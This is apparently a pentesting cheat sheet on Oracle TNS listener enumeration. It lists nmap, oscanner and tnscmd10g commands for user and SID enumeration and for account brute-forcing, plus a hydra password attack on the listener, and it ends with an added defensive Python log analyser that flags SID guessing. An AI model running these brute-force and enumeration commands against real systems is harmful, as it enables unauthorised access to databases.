Oracle (Port 1521)
Quick Intro
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation.
When enumerating Oracle, the first step is to talk to the TNS listener, which usually resides on the default port 1521/TCP (you may also find secondary listeners on 1522–1529).
Nmap Script
nmap -p 1521 -A $ip
nmap -n -v -sV -Pn -p 1521 --script=oracle-enum-users --script-args sid=ORCL,userdb=users.txt $ip
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
# TNS listener version
nmap --script=oracle-sid-brute $ip
nmap -n -v -sV -Pn -p 1521 --script=oracle-brute $ip
# Brute-Force Account
oscanner
oscanner -s $ip -P 1521
Fingerprint oracle tns
tnscmd10g = A tool to prod the oracle tnslsnr process
tnscmd10g version -h 192.168.1.101
tnscmd10g status -h 192.168.1.101
Other useful TNS listener commands:
Command       Purpose
ping          Ping the listener
version       Provide output of the listener version and platform information
status        Return the current status and variables used by the listener
services      Dump service data
debug         Dump debugging information to the listener log
reload        Reload the listener configuration file
save_config   Write the listener configuration file to a backup location
stop          Invoke listener shutdown
If you receive an error, it could be because the TNS versions are incompatible (use the --10G parameter with tnscmd10g). If the error persists, the listener may be password protected (you can see a list where all the errors are detailed here). Don't worry, hydra to the rescue:
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
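On the defending side, the listener commands in the table above and repeated SID guesses both show up in the listener log. The following is an added example, not part of the original page: it counts listener commands and flags sources with repeated TNS-12505 (unknown SID) failures. The sample lines are constructed, and the " * "-separated log layout, the analyze() name and the threshold are assumptions.

```python
import re
from collections import Counter, defaultdict

# Listener commands from the table above; seeing them in the log means
# someone queried or managed the listener.
LISTENER_COMMANDS = {"ping", "version", "status", "services", "debug",
                     "reload", "save_config", "stop"}
TNS_UNKNOWN_SID = "12505"  # TNS-12505: listener does not know the requested SID

# Constructed sample lines; the " * "-separated layout is an assumed format.
SAMPLE_LOG = """\
12-MAR-2024 09:14:01 * (CONNECT_DATA=(COMMAND=version)) * version * 0
12-MAR-2024 09:14:03 * (CONNECT_DATA=(COMMAND=status)) * status * 0
12-MAR-2024 09:15:10 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=40112)) * establish * ORCL * 0
12-MAR-2024 09:16:00 * (CONNECT_DATA=(SID=TEST)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=51001)) * establish * TEST * 12505
12-MAR-2024 09:16:00 * (CONNECT_DATA=(SID=PROD)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=51002)) * establish * PROD * 12505
12-MAR-2024 09:16:01 * (CONNECT_DATA=(SID=XE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.99)(PORT=51003)) * establish * XE * 12505
12-MAR-2024 09:20:44 * (CONNECT_DATA=(SID=ORCLL)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=40150)) * establish * ORCLL * 12505
"""

ADDR_HOST = re.compile(r"\(ADDRESS=.*?\(HOST=([^)]+)\)")

def analyze(log_text, sid_threshold=3):
    """Return (command counts, {source: failed SIDs}) for noisy sources."""
    commands = Counter()
    failed = defaultdict(set)
    for line in log_text.splitlines():
        fields = [f.strip() for f in line.split(" * ")]
        if len(fields) < 4:
            continue  # banner, trace or continuation line
        event, code = fields[-2], fields[-1]
        if len(fields) == 4 and event in LISTENER_COMMANDS:
            commands[event] += 1  # command entries carry no client address
        elif len(fields) >= 6 and fields[-3] == "establish" and code == TNS_UNKNOWN_SID:
            m = ADDR_HOST.search(fields[2])
            failed[m.group(1) if m else "unknown"].add(fields[-2])
    # A single mistyped SID is normal; many distinct unknown SIDs are not.
    guessers = {h: sorted(s) for h, s in failed.items() if len(s) >= sid_threshold}
    return commands, guessers

if __name__ == "__main__":
    cmds, guessers = analyze(SAMPLE_LOG)
    print("listener commands seen:", dict(cmds))
    print("possible SID guessing:", guessers)
```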